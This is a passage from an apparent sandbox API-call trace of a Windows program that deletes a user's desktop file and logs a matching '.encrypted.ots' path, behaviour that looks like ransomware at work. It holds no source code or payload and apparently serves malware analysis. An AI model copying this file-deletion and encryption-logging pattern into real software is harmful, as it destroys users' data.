lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.139] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.139] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.139] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.139] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", lpFilePart=0x0) returned 0x39 [0032.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd949b800, ftCreationTime.dwHighDateTime=0x1d5bd53, ftLastAccessTime.dwLowDateTime=0x2c0674d0, ftLastAccessTime.dwHighDateTime=0x1d5b605, ftLastWriteTime.dwLowDateTime=0x1309cf20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12987, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="wzgmnB4vWuNbBj9.ots", cAlternateFileName="WZGMNB~1.OTS")) returned 0x7c2100 [0032.139] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzgmnb4vwunbbj9.ots")) returned 1 [0032.141] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd949b800, ftCreationTime.dwHighDateTime=0x1d5bd53, ftLastAccessTime.dwLowDateTime=0x2c0674d0, ftLastAccessTime.dwHighDateTime=0x1d5b605, ftLastWriteTime.dwLowDateTime=0x1309cf20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12987, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="wzgmnB4vWuNbBj9.ots", cAlternateFileName="WZGMNB~1.OTS")) returned 0 [0032.141] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.141] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.141] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.141] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.141] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.142] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.142] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.142] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.142] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.142] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.142] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.142] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.143] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.143] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.143] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.143] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xbad, lpOverlapped=0x0) returned 1 [0032.143] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.143] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xbad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.143] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.encrypted.ots\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0032.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0032.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.encrypted.ots\r\n", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.encrypted.ots\r\n", lpUsedDefaultChar=0x0) returned 70 [0032.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0032.143] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x45, lpOverlapped=0x0) returned 1 [0032.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.144] CloseHandle (hObject=0x140) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.145] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.145] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.146] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.146] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.146] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.146] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0032.147] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.148] RtlAllocateHeap 